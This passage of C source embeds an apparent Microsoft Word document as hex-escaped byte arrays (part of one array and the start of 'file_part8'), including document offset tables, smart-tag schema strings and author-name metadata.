+"\xaa\x6f\x00\x00\xdd\x6f\x00\x00\x11\x70\x00\x00\x3e\x70\x00\x00" +"\x6e\x70\x00\x00\xa2\x70\x00\x00\xd9\x70\x00\x00\x05\x71\x00\x00" +"\x31\x71\x00\x00\x5f\x71\x00\x00\x8c\x71\x00\x00\xbf\x71\x00\x00" +"\xe4\x71\x00\x00\x07\x72\x00\x00\x3f\x72\x00\x00\x6c\x72\x00\x00" +"\x9e\x72\x00\x00\xd4\x72\x00\x00\x03\x73\x00\x00\x31\x73\x00\x00" 
+"\x55\x73\x00\x00\x80\x73\x00\x00\xaa\x73\x00\x00\xe5\x73\x00\x00" +"\x11\x74\x00\x00\x40\x74\x00\x00\x66\x74\x00\x00\x87\x74\x00\x00" +"\xb7\x74\x00\x00\xf0\x74\x00\x00\x20\x75\x00\x00\x54\x75\x00\x00" +"\x7a\x75\x00\x00\x9d\x75\x00\x00\xc7\x75\x00\x00\x02\x76\x00\x00" +"\x36\x76\x00\x00\x60\x76\x00\x00\x88\x76\x00\x00\xa9\x76\x00\x00" +"\xd2\x76\x00\x00\x07\x77\x00\x00\x3d\x77\x00\x00\x1a\x7c\x00\x00" +"\x40\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00" +"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x49\x00\x00\x00" +"\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00\x4e\x00\x00\x00" +"\x4f\x00\x00\x00\x50\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00" +"\x54\x00\x00\x00\x55\x00\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00" +"\x58\x00\x00\x00\x59\x00\x00\x00\x5a\x00\x00\x00\x5b\x00\x00\x00" +"\x5c\x00\x00\x00\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00" +"\x60\x00\x00\x00\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00" +"\x64\x00\x00\x00\x65\x00\x00\x00\x66\x00\x00\x00\x67\x00\x00\x00" +"\x68\x00\x00\x00\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00" +"\x6c\x00\x00\x00\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00" +"\x70\x00\x00\x00\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00" +"\x74\x00\x00\x00\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00" +"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00" +"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x00\x06\x00\x00" +"\x19\x7c\x00\x00\x41\x00\x00\x00\x16\x00\x00\x00\x1d\x00\x00\x00" +"\x1f\x00\x00\x00\x3c\x00\x00\x00\x13\x21\xf4\xff\x95\x80\xff\xff" +"\x23\x00\x00\x00\x06\x00\xd7\x43\x05\x00\x00\x00\x02\x00\x74\x0e" +"\x29\x04\x06\x00\xd8\x43\x05\x00\x00\x00\x02\x00\xb4\x0e\x29\x04" +"\x06\x00\xd9\x43\x05\x00\x00\x00\x02\x00\xf4\x0e\x29\x04\x06\x00" +"\xda\x43\x05\x00\x00\x00\x02\x00\x7c\x09\x29\x04\x06\x00\xdb\x43" +"\x05\x00\x00\x00\x02\x00\x6c\xee\x28\x04\x06\x00\xdc\x43\x05\x00" +"\x00\x00\x02\x00\xac\xee\x28\x04\x06\x00\xdd\x43\x05\x00\x00\x00" 
+"\x02\x00\x3c\xeb\x28\x04\x06\x00\xde\x43\x05\x00\x00\x00\x02\x00" +"\x7c\xeb\x28\x04\x06\x00\xdf\x43\x05\x00\x00\x00\x02\x00\xbc\xeb" +"\x28\x04\x06\x00\xe0\x43\x05\x00\x00\x00\x02\x00\x54\xe8\x28\x04" +"\x06\x00\xe1\x43\x05\x00\x00\x00\x02\x00\x94\xe8\x28\x04\x06\x00" +"\xe2\x43\x05\x00\x00\x00\x02\x00\xd4\xe8\x28\x04\x06\x00\xe3\x43" +"\x05\x00\x00\x00\x02\x00\x8c\xdd\x28\x04\x06\x00\xe4\x43\x05\x00" +"\x00\x00\x02\x00\xcc\xdd\x28\x04\x06\x00\xe5\x43\x05\x00\x00\x00" +"\x02\x00\x0c\xde\x28\x04\x06\x00\xe6\x43\x05\x00\x00\x00\x02\x00" +"\xcc\xda\x28\x04\x06\x00\xe7\x43\x05\x00\x00\x00\x02\x00\x0c\xdb" +"\x28\x04\x06\x00\xe8\x43\x05\x00\x00\x00\x02\x00\x4c\xdb\x28\x04" +"\x06\x00\xe9\x43\x05\x00\x00\x00\x02\x00\x8c\xd5\x28\x04\x06\x00" +"\xea\x43\x05\x00\x00\x00\x02\x00\xcc\xd5\x28\x04\x06\x00\xeb\x43" +"\x05\x00\x00\x00\x02\x00\x0c\xd6\x28\x04\x06\x00\xec\x43\x05\x00" +"\x00\x00\x02\x00\xa4\xd2\x28\x04\x06\x00\xed\x43\x05\x00\x00\x00" +"\x02\x00\xe4\xd2\x28\x04\x06\x00\xee\x43\x05\x00\x00\x00\x02\x00" +"\x24\xd3\x28\x04\x06\x00\xef\x43\x05\x00\x00\x00\x02\x00\x7c\xcf" +"\x28\x04\x06\x00\xf0\x43\x05\x00\x00\x00\x02\x00\xbc\xcf\x28\x04" +"\x06\x00\xf1\x43\x05\x00\x00\x00\x02\x00\xfc\xcf\x28\x04\x06\x00" +"\xf2\x43\x05\x00\x00\x00\x02\x00\x6c\xcc\x28\x04\x06\x00\xf3\x43" +"\x05\x00\x00\x00\x02\x00\xac\xcc\x28\x04\x06\x00\xf4\x43\x05\x00" +"\x00\x00\x02\x00\xec\xcc\x28\x04\x06\x00\xf5\x43\x05\x00\x00\x00" +"\x02\x00\x84\xc9\x28\x04\x06\x00\xf6\x43\x05\x00\x00\x00\x02\x00" +"\xc4\xc9\x28\x04\x06\x00\xf7\x43\x05\x00\x00\x00\x02\x00\x04\xca" +"\x28\x04\x06\x00\xf8\x43\x05\x00\x00\x00\x02\x00\xe4\xc5\x28\x04" +"\x06\x00\xf9\x43\x05\x00\x00\x00\x02\x00\x24\xc6\x28\x04\x25\x01" +"\x00\x00\x55\x01\x00\x00\x04\x0d\x00\x00\x8e\x13\x00\x00\x68\x16" +"\x00\x00\x5e\x17\x00\x00\x07\x18\x00\x00\x4f\x1e\x00\x00\x42\x20" +"\x00\x00\xfb\x20\x00\x00\x74\x23\x00\x00\x2c\x26\x00\x00\x02\x52" +"\x00\x00\x9d\x52\x00\x00\x00\x53\x00\x00\x7c\x53\x5e\x00\xae\x53" 
+"\x00\x00\x2b\x54\x00\x00\x9f\x56\x00\x00\xc7\x56\x00\x00\xe6\x56" +"\x00\x00\xa0\x57\x00\x00\xec\x57\x00\x00\x85\x5a\x00\x00\x90\x5a" +"\x00\x00\x48\x5b\x00\x00\xff\x5c\x00\x00\xad\x67\x00\x00\xe0\x67" +"\x00\x00\x15\x68\x00\x00\x4c\x68\x00\x00\x4f\x68\x00\x00\x20\x6b" +"\x00\x00\x5c\x6d\x00\x00\x6d\x6f\x00\x00\x1b\x74\x00\x00\x00\x00" +"\x00\x00\x01\x00\x01\x00\x00\x00\x01\x00\x02\x00\x00\x00\x01\x00" +"\x03\x00\x00\x00\x01\x00\x04\x00\x00\x00\x01\x00\x05\x00\x00\x00" +"\x01\x00\x06\x00\x00\x00\x01\x00\x07\x00\x00\x00\x01\x00\x08\x00" +"\x00\x00\x01\x00\x09\x00\x00\x00\x01\x00\x0a\x00\x00\x00\x01\x00" +"\x0b\x00\x00\x00\x01\x00\x0c\x00\x00\x00\x01\x00\x0d\x00\x00\x00" +"\x01\x00\x0e\x00\x00\x00\x01\x00\x0f\x00\x00\x00\x01\x00\x10\x00" +"\x00\x00\x01\x00\x11\x00\x00\x00\x01\x00\x12\x00\x00\x00\x01\x00" +"\x13\x00\x00\x00\x01\x00\x14\x00\x00\x00\x01\x00\x15\x00\x00\x00" +"\x01\x00\x16\x00\x00\x00\x01\x00\x17\x00\x00\x00\x01\x00\x18\x00" +"\x00\x00\x01\x00\x19\x00\x00\x00\x01\x00\x1a\x00\x00\x00\x01\x00" +"\x1b\x00\x00\x00\x01\x00\x1c\x00\x00\x00\x01\x00\x1d\x00\x00\x00" +"\x01\x00\x1e\x00\x00\x00\x01\x00\x1f\x00\x00\x00\x01\x00\x20\x00" +"\x00\x00\x01\x00\x21\x00\x00\x00\x01\x00\x22\x00\x00\x00\x01\x00" +"\x2a\x01\x00\x00\x5a\x01\x00\x00\x09\x0d\x00\x00\x90\x13\x00\x00" +"\x6a\x16\x00\x00\x60\x17\x00\x00\x09\x18\x00\x00\x51\x1e\x00\x00" +"\x44\x20\x00\x00\xfd\x20\x00\x00\x76\x23\x00\x00\x2e\x26\x00\x00" +"\x04\x52\x00\x00\x9f\x52\x00\x00\x02\x53\x00\x00\x7e\x53\x00\x00" +"\xb0\x53\x00\x00\x2d\x54\x00\x00\xa1\x56\x00\x00\xc9\x56\x00\x00" +"\xe8\x56\x00\x00\xa2\x57\x00\x00\xee\x57\x00\x00\x87\x5a\x00\x00" +"\x92\x5a\x00\x00\x4a\x5b\x00\x00\x01\x5d\x00\x00\xaf\x67\x00\x00" +"\xe2\x67\x00\x00\x17\x68\x00\x00\x4e\x68\x00\x00\x51\x68\x00\x00" +"\x24\x6b\x00\x00\x61\x6d\x00\x00\x72\x6f\x00\x00\x1b\x74\x00\x00" +"\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00" +"\x04\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00" 
+"\x08\x00\x00\x00\x09\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00" +"\x0c\x00\x00\x00\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00" +"\x10\x00\x00\x00\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00" +"\x14\x00\x00\x00\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00" +"\x18\x00\x00\x00\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00" +"\x1c\x00\x00\x00\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00" +"\x20\x00\x00\x00\x21\x00\x00\x00\x22\x00\x00\x00\x01\x00\x00\x00" +"\x3e\x00\x00\x00\x23\x00\x00\x00\x2a\x80\x75\x72\x6e\x3a\x73\x63" +"\x68\x65\x6d\x61\x73\x2d\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2d" +"\x63\x6f\x6d\x3a\x6f\x66\x66\x69\x63\x65\x3a\x73\x6d\x61\x72\x74" +"\x74\x61\x67\x73\x0a\x80\x50\x65\x72\x73\x6f\x6e\x4e\x61\x6d\x65" +"\x00\x80\x0c\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x23\x00" +"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00" +"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00" +"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00" +"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00" +"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00" +"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00" +"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00" +"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00" +"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\xd3\x00\x00\x00\x23\x00" +"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00" +"\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00" +"\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00" +"\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00\x23\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x54\x50\x00\x00\x5a\x50\x00\x00\xc3\x50\x00\x00" +"\xc8\x50\x00\x00\xfd\x50\x00\x00\x05\x51\x00\x00\x55\x51\x00\x00" +"\x5c\x51\x00\x00\xcd\x67\x00\x00\xd7\x67\x00\x00\x00\x68\x00\x00" +"\x0c\x68\x00\x00\x1e\x68\x00\x00\x24\x68\x00\x00\x57\x68\x00\x00" 
+"\x5e\x68\x00\x00\x6e\x68\x00\x00\x75\x68\x00\x00\x92\x68\x00\x00" +"\x99\x68\x00\x00\xc3\x68\x00\x00\xd0\x68\x00\x00\xdd\x68\x00\x00" +"\xe5\x68\x00\x00\x3c\x69\x00\x00\x45\x69\x00\x00\x8c\x69\x00\x00" +"\x95\x69\x00\x00\xda\x69\x00\x00\xe3\x69\x00\x00\x47\x6a\x00\x00" +"\x4d\x6a\x00\x00\xed\x6a\x00\x00\xf3\x6a\x00\x00\x03\x6b\x00\x00" +"\x0a\x6b\x00\x00\x29\x6b\x00\x00\x30\x6b\x00\x00\x70\x6b\x00\x00" +"\x77\x6b\x00\x00\xdc\x6b\x00\x00\xe0\x6b\x00\x00\x6e\x6c\x00\x00" +"\x78\x6c\x00\x00\x8b\x6c\x00\x00\x91\x6c\x00\x00\xa5\x6c\x00\x00" +"\xb2\x6c\x00\x00\xd6\x6c\x00\x00\xdd\x6c\x00\x00\xe0\x6c\x00\x00" +"\xe6\x6c\x00\x00\x42\x6d\x00\x00\x4b\x6d\x00\x00\x4c\x6d\x00\x00" +"\x53\x6d\x00\x00\x65\x6d\x00\x00\x6a\x6d\x00\x00\xac\x6d\x00\x00" +"\xba\x6d\x00\x00\xf5\x6d\x00\x00\xf8\x6d\x00\x00\x28\x6e\x00\x00" +"\x31\x6e\x00\x00\x43\x6e\x00\x00\x47\x6e\x00\x00\xb8\x6e\x00\x00" +"\xc3\x6e\x00\x00\xfb\x6e\x00\x00\x02\x6f\x00\x00\x0e\x6f\x00\x00" +"\x14\x6f\x00\x00\x2e\x6f\x00\x00\x3b\x6f\x00\x00\x74\x71\x00\x00" +"\x7a\x71\x00\x00\x7d\x71\x00\x00\x84\x71\x00\x00\xdf\x73\x00\x00" +"\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" +"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" +"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" +"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" +"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" +"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" +"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" +"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" +"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" +"\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00\x07\x00\x1c\x00" +"\x07\x00\x04\x00\x07\x00\x07\x00\x02\x00\x00\x00\x00\x00\x80\x01" +"\x00\x00\x83\x01\x00\x00\xda\x06\x00\x00\xdb\x06\x00\x00\xa2\x0d" +"\x00\x00\xa4\x0d\x00\x00\x8e\x1b\x00\x00\x95\x1b\x00\x00\x1d\x25" 
+"\x00\x00\x1f\x25\x00\x00\xf8\x2e\x00\x00\x1c\x2f\x00\x00\x58\x3c" +"\x00\x00\x60\x3c\x00\x00\x10\x48\x00\x00\x19\x48\x00\x00\xdf\x73" +"\x00\x00\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x33\x00\x07\x00" +"\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00" +"\x33\x00\x07\x00\x33\x00\x07\x00\x33\x00\x07\x00\x07\x00\x02\x00" +"\x00\x00\x00\x00\x1b\x4f\x00\x00\x32\x4f\x00\x00\x10\x50\x00\x00" +"\x40\x50\x00\x00\x42\x50\x00\x00\x43\x50\x00\x00\xca\x50\x00\x00" +"\xdd\x50\x00\x00\x42\x5d\x00\x00\x6f\x5d\x00\x00\x7b\x5e\x00\x00" +"\x86\x5e\x00\x00\xa3\x5f\x00\x00\xb0\x5f\x00\x00\x81\x60\x00\x00" +"\x8b\x60\x00\x00\xd4\x60\x00\x00\x07\x61\x00\x00\xa7\x67\x00\x00" +"\x34\x68\x00\x00\x54\x68\x00\x00\x6e\x68\x00\x00\xa3\x68\x00\x00" +"\xf3\x69\x00\x00\x13\x6a\x00\x00\x22\x6a\x00\x00\x44\x6a\x00\x00" +"\x5d\x6a\x00\x00\x75\x6a\x00\x00\x6e\x6c\x00\x00\x7a\x6c\x00\x00" +"\x7f\x6c\x00\x00\xf3\x6c\x00\x00\x77\x6e\x00\x00\x7f\x6e\x00\x00" +"\x3e\x6f\x00\x00\xdf\x73\x00\x00\xf5\x73\x00\x00\xff\x73\x00\x00" +"\x06\x74\x00\x00\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x05\x00" +"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00" +"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00" +"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00" +"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00" +"\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x05\x00\x07\x00\x02\x00" +"\x00\x00\x00\x00\x7d\x71\x00\x00\x84\x71\x00\x00\xdf\x73\x00\x00" +"\x18\x74\x00\x00\x1b\x74\x00\x00\x07\x00\x04\x00\x07\x00\x07\x00" +"\x02\x00\xff\xff\x14\x00\x00\x00\x08\x00\x50\x00\x61\x00\x74\x00" +"\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x00\x00\x08\x00\x50\x00" +"\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x00\x00" +"\x08\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00" +"\x61\x00\x00\x00\x08\x00\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00" +"\x63\x00\x69\x00\x61\x00\x00\x00\x0f\x00\x50\x00\x61\x00\x74\x00" 
+"\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00\x4d\x00\x4f\x00" +"\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00\x50\x00\x61\x00" +"\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00\x4d\x00" +"\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00\x50\x00" +"\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00\x20\x00" +"\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00\x0f\x00" +"\x50\x00\x61\x00\x74\x00\x72\x00\x69\x00\x63\x00\x69\x00\x61\x00" +"\x20\x00\x4d\x00\x4f\x00\x4e\x00\x49\x00\x4f\x00\x54\x00\x00\x00" +"\x06\x00\x4d\x00\x6f\x00\x6e\x00\x69\x00\x6f\x00\x74\x00\x00\x00" +"\x03\x00\x50\x00\x61\x00\x74\x00\x00\x00\x01\x00\xc9\x6e\x24\x4f" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x02\x00\x0a\x00" +"\x00\x00\x04\x00\x00\x00\x08\x00\x00\x00\xe5\x00\x00\x00\x00\x00" +"\x00\x00\x09\x00\x00\x00\x55\x3b\x1b\x00\x1e\x3b\x1d\x00\x02\x75" +"\x3b\x00\x45\x6d\x47\x00\xae\x0f\x6a\x00\xa5\x49\x73\x00\x2e\x20" +"\xb9\x00\x52\x59\xd7\x00\x3e\x75\xec\x00\x25\x31\xed\x00\x00\x00" +"\x00\x00\x15\x27\x00\x00\x90\x28\x00\x00\xef\x44\x00\x00\xde\x50" +"\x00\x00\x4e\x5b\x00\x00\x4f\x5b\x00\x00\x45\x5c\x00\x00\x46\x5c" +"\x00\x00\xf1\x5e\x00\x00\xfc\x5e\x00\x00\x36\x62\x00\x00\x41\x62" +"\x00\x00\x2d\x66\x00\x00\x15\x67\x00\x00\xa6\x67\x00\x00\xa7\x67" +"\x00\x00\xaa\x67\x00\x00\xb1\x67\x00\x00\xbe\x67\x00\x00\xcd\x67" +"\x00\x00\xd8\x67\x00\x00\xdc\x67\x00\x00\xdd\x67\x00\x00\xe0\x67" +"\x00\x00\xe5\x67\x00\x00\xf1\x67\x00\x00\x00\x68\x00\x00\x0d\x68" +"\x00\x00\x11\x68\x00\x00\x12\x68\x00\x00\x15\x68\x00\x00\x1a\x68" +"\x00\x00\x25\x68\x00\x00\x34\x68\x00\x00\x3e\x68\x00\x00\x48\x68" +"\x00\x00\x49\x68\x00\x00\x4c\x68\x00\x00\x54\x68\x00\x00\x5f\x68" +"\x00\x00\x6e\x68\x00\x00\x81\x68\x00\x00\x85\x68\x00\x00\x86\x68" +"\x00\x00\x89\x68\x00\x00\x8e\x68\x00\x00\xa2\x68\x00\x00\xb1\x68" +"\x00\x00\xc3\x68\x00\x00\xd1\x68\x00\x00\xd2\x68\x00\x00\xd5\x68" +"\x00\x00\xd9\x68\x00\x00\xe6\x68\x00\x00\xf5\x68\x00\x00\xfd\x68" 
+"\x00\x00\x01\x69\x00\x00\x02\x69\x00\x00\x05\x69\x00\x00\x0a\x69" +"\x00\x00\x13\x69\x00\x00\x22\x69\x00\x00\x2c\x69\x00\x00\x30\x69" +"\x00\x00\x31\x69\x00\x00\x34\x69\x00\x00\x39\x69\x00\x00\x46\x69" +"\x00\x00\x55\x69\x00\x00\x5b\x69\x00\x00\x5f\x69\x00\x00\x60\x69" +"\x00\x00\x63\x69\x00\x00\x68\x69\x00\x00\x75\x69\x00\x00\x84\x69" +"\x00\x00\x8c\x69\x00\x00\x9a\x69\x00\x00\x9b\x69\x00\x00\x9e\x69" +"\x00\x00\xa3\x69\x00\x00\xb0\x69\x00\x00\xbf\x69\x00\x00\xc6\x69" +"\x00\x00\xce\x69\x00\x00\xcf\x69\x00\x00\xd2\x69\x00\x00\xd7\x69" +"\x00\x00\xe4\x69\x00\x00\xf3\x69\x00\x00\xfb\x69\x00\x00\xff\x69" +"\x00\x00\x00\x6a\x00\x00\x03\x6a\x00\x00\x07\x6a\x00\x00\x13\x6a" +"\x00\x00\x22\x6a\x00\x00\x33\x6a\x00\x00\x3b\x6a\x00\x00\x3c\x6a" +"\x00\x00\x3f\x6a\x00\x00\x44\x6a\x00\x00\x4e\x6a\x00\x00\x5d\x6a" +"\x00\x00\x67\x6a\x00\x00\x6b\x6a\x00\x00\x6c\x6a\x00\x00\x6f\x6a" +"\x00\x00\x75\x6a\x00\x00\x80\x6a\x00\x00\x8f\x6a\x00\x00\x96\x6a" +"\x00\x00\x9e\x6a\x00\x00\x9f\x6a\x00\x00\xa2\x6a\x00\x00\xa8\x6a" +"\x00\x00\xb6\x6a\x00\x00\xc5\x6a\x00\x00\xd4\x6a\x00\x00\xe1\x6a" +"\x00\x00\xe2\x6a\x00\x00\xe5\x6a\x00\x00\xea\x6a\x00\x00\xf4\x6a" +"\x00\x00\x03\x6b\x00\x00\x14\x6b\x00\x00\x1c\x6b\x00\x00\x1d\x6b" +"\x00\x00\x20\x6b\x00\x00\x25\x6b\x00\x00\x31\x6b\x00\x00\x40\x6b" +"\x00\x00\x48\x6b\x00\x00\x4c\x6b\x00\x00\x4d\x6b\x00\x00\x50\x6b" +"\x00\x00\x55\x6b\x00\x00\x61\x6b\x00\x00\x70\x6b\x00\x00\x78\x6b" +"\x00\x00\x7c\x6b\x00\x00\x7d\x6b\x00\x00\x80\x6b\x00\x00\x85\x6b" +"\x00\x00\x90\x6b\x00\x00\x9f\x6b\x00\x00\xa5\x6b\x00\x00\xa9\x6b" +"\x00\x00\xaa\x6b\x00\x00\xad\x6b\x00\x00\xb2\x6b\x00\x00\xbe\x6b" +"\x00\x00\xcd\x6b\x00\x00\xe1\x6b\x00\x00\xe5\x6b\x00\x00\xe6\x6b" +"\x00\x00\xe9\x6b\x00\x00\xee\x6b\x00\x00\xf8\x6b\x00\x00\x07\x6c" +"\x00\x00\x11\x6c\x00\x00\x15\x6c\x00\x00\x16\x6c\x00\x00\x19\x6c" +"\x00\x00\x20\x6c\x00\x00\x31\x6c\x00\x00\x40\x6c\x00\x00\x47\x6c" +"\x00\x00\x4b\x6c\x00\x00\x4c\x6c\x00\x00\x4f\x6c\x00\x00\x54\x6c" 
+"\x00\x00\x66\x6c\x00\x00\x67\x6c\x00\x00\x6e\x6c\x00\x00\x7e\x6c" +"\x00\x00\x7f\x6c\x00\x00\x82\x6c\x00\x00\x87\x6c\x00\x00\x92\x6c" +"\x00\x00\xa1\x6c\x00\x00\xa5\x6c\x00\x00\xb3\x6c\x00\x00\xb4\x6c" +"\x00\x00\xb7\x6c\x00\x00\xbb\x6c\x00\x00\xc7\x6c\x00\x00\xd6\x6c" +"\x00\x00\xe7\x6c\x00\x00\xef\x6c\x00\x00\xf0\x6c\x00\x00\xf3\x6c" +"\x00\x00\xf8\x6c\x00\x00\x01\x6d\x00\x00\x10\x6d\x00\x00\x1c\x6d" +"\x00\x00\x20\x6d\x00\x00\x21\x6d\x00\x00\x24\x6d\x00\x00\x28\x6d" +"\x00\x00\x33\x6d\x00\x00\x42\x6d\x00\x00\x54\x6d\x00\x00\x58\x6d" +; +char file_part8[]= +"\x00\x00\x59\x6d\x00\x00\x5c\x6d\x00\x00\x62\x6d\x00\x00\x6b\x6d" +"\x00\x00\x7a\x6d\x00\x00\x82\x6d\x00\x00\x8a\x6d\x00\x00\x8b\x6d" +"\x00\x00\x8e\x6d\x00\x00\x93\x6d\x00\x00\x9d\x6d\x00\x00\xac\x6d" +"\x00\x00\xbb\x6d\x2c\x00\xbf\x6d\x00\x00\xc0\x6d\x00\x00\xc3\x6d" +"\x00\x00\xc7\x6d\x00\x00\xd9\x6d\x00\x00\xe8\x6d\x00\x00\xee\x6d" +"\x00\x00\xfe\x6d\x00\x00\xff\x6d\x00\x00\x02\x6e\x00\x00\x07\x6e" +"\x00\x00\x19\x6e\x00\x00\x28\x6e\x00\x00\x32\x6e\x00\x00\x36\x6e" +"\x00\x00\x37\x6e\x00\x00\x3a\x6e\x00\x00\x3f\x6e\x00\x00\x48\x6e" +"\x00\x00\x57\x6e\x00\x00\x60\x6e\x00\x00\x64\x6e\x00\x00\x65\x6e" +"\x00\x00\x68\x6e\x00\x00\x6d\x6e\x00\x00\x79\x6e\x00\x00\x88\x6e" +"\x00\x00\x90\x6e\x00\x00\x94\x6e\x00\x00\x95\x6e\x00\x00\x98\x6e" +"\x00\x00\x9e\x6e\x00\x00\xa9\x6e\x00\x00\xb8\x6e\x00\x00\xc4\x6e" +"\x00\x00\xc9\x6e\x00\x00\xca\x6e\x00\x00\xcd\x6e\x00\x00\xd2\x6e" +"\x00\x00\xdd\x6e\x00\x00\xec\x6e\x00\x00\xf5\x6e\x00\x00\x03\x6f" +"\x00\x00\x04\x6f\x00\x00\x07\x6f\x00\x00\x0b\x6f\x00\x00\x15\x6f" +"\x00\x00\x24\x6f\x00\x00\x2e\x6f\x00\x00\x3c\x6f\x00\x00\x3d\x6f" +"\x00\x00\xbb\x6f\x00\x00\xb1\x73\x00\x00\x1b\x74\x00\x00\x00\x00" +"\x00\x00\x35\x00\x00\x00\x01\x00\x00\x00\x35\x00\x00\x00\x21\x86" +"\x02\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00" 
+"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01" +"\x00\x04\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01" +"\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01\x00\x00\x02\x01" +"\x00\x00\x02\x01\x00\x00\x9e\x01\x00\x04\x02\x01\x00\x00\x02\x01" 